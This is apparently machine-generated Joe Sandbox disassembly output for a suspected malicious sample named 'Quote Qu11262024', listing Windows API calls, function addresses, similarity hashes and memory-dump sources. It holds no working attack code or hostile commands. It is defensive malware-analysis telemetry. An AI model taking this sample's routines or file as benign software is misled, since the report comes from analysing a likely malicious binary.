                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2678498856-0
                                                                                                    • Opcode ID: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                                                    • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                    • Opcode Fuzzy Hash: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                                                    • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                    • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                    • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                    • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Item
                                                                                                    • String ID:
                                                                                                    • API String ID: 3888421826-0
                                                                                                    • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                    • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                                    • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                    • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00417B7B
                                                                                                    • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                    • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                    • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$ErrorLastLockUnlockmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 3727323765-0
                                                                                                    • Opcode ID: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                                                    • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                                    • Opcode Fuzzy Hash: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                                                    • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040F673
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040F690
                                                                                                    • strlen.MSVCRT ref: 0040F6A2
                                                                                                    • WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040F6B3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2754987064-0
                                                                                                    • Opcode ID: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                                                    • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                    • Opcode Fuzzy Hash: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                                                    • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040F6E2
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,0044E5FC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040F6FB
                                                                                                    • strlen.MSVCRT ref: 0040F70D
                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040F71E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2754987064-0
                                                                                                    • Opcode ID: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                                                    • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                    • Opcode Fuzzy Hash: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                                                    • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00402FD7
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                    • strlen.MSVCRT ref: 00403006
                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2754987064-0
                                                                                                    • Opcode ID: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                                                                    • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                                    • Opcode Fuzzy Hash: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                                                                    • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                                    APIs
                                                                                                      • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                      • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                      • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                    • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                    • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 764393265-0
                                                                                                    • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                    • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                    • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                    • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                    APIs
                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Time$System$File$LocalSpecific
                                                                                                    • String ID:
                                                                                                    • API String ID: 979780441-0
                                                                                                    • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                    • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                    • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                    • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                    • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                    • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$DialogHandleModuleParam
                                                                                                    • String ID:
                                                                                                    • API String ID: 1386444988-0
                                                                                                    • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                    • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                    • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                    • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                    • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InvalidateMessageRectSend
                                                                                                    • String ID: d=E
                                                                                                    • API String ID: 909852535-3703654223
                                                                                                    • Opcode ID: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                                                                    • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                                    • Opcode Fuzzy Hash: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                                                                    • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                                    APIs
                                                                                                    • wcschr.MSVCRT ref: 0040F79E
                                                                                                    • wcschr.MSVCRT ref: 0040F7AC
                                                                                                      • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                      • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4), ref: 0040AACB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wcschr$memcpywcslen
                                                                                                    • String ID: "
                                                                                                    • API String ID: 1983396471-123907689
                                                                                                    • Opcode ID: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                                                                    • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                    • Opcode Fuzzy Hash: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                                                                    • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                    • _memicmp.MSVCRT ref: 0040C00D
                                                                                                    • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FilePointer_memicmpmemcpy
                                                                                                    • String ID: URL
                                                                                                    • API String ID: 2108176848-3574463123
                                                                                                    • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                    • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                                    • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                    • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                                    APIs
                                                                                                    • _snwprintf.MSVCRT ref: 0040A398
                                                                                                    • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _snwprintfmemcpy
                                                                                                    • String ID: %2.2X
                                                                                                    • API String ID: 2789212964-323797159
                                                                                                    • Opcode ID: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                                                    • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                    • Opcode Fuzzy Hash: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                                                    • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _snwprintf
                                                                                                    • String ID: %%-%d.%ds
                                                                                                    • API String ID: 3988819677-2008345750
                                                                                                    • Opcode ID: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                                                    • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                    • Opcode Fuzzy Hash: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                                                    • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                    APIs
                                                                                                    • GetWindowPlacement.USER32(?,?,?,?,?,00411B7F,?,General,?,00000000,00000001), ref: 00401904
                                                                                                    • memset.MSVCRT ref: 00401917
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PlacementWindowmemset
                                                                                                    • String ID: WinPos
                                                                                                    • API String ID: 4036792311-2823255486
                                                                                                    • Opcode ID: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                                                    • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                    • Opcode Fuzzy Hash: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                                                    • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                    APIs
                                                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                    • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                    • wcscat.MSVCRT ref: 0040DCFF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileModuleNamewcscatwcsrchr
                                                                                                    • String ID: _lng.ini
                                                                                                    • API String ID: 383090722-1948609170
                                                                                                    • Opcode ID: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                                                    • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                                    • Opcode Fuzzy Hash: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                                                    • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                    • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                    • API String ID: 2773794195-880857682
                                                                                                    • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                                    • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                                    • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                                    • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                                    APIs
                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0040A159
                                                                                                    • SetWindowLongW.USER32(000000EC,000000EC,00000000), ref: 0040A16B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LongWindow
                                                                                                    • String ID: MZ@
                                                                                                    • API String ID: 1378638983-2978689999
                                                                                                    • Opcode ID: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                                                    • Instruction ID: 658df1d6f65a5f4ca5cf2dc917bfbc57e2b12ac14a328fb0c2cac09aa770bd9f
                                                                                                    • Opcode Fuzzy Hash: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                                                    • Instruction Fuzzy Hash: 3FC0027415D116AFDF112B35EC0AE2A7EA9BB86362F208BB4B076E01F1CB7184109A09
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                                    • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                                    • memset.MSVCRT ref: 0042BAAE
                                                                                                    • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
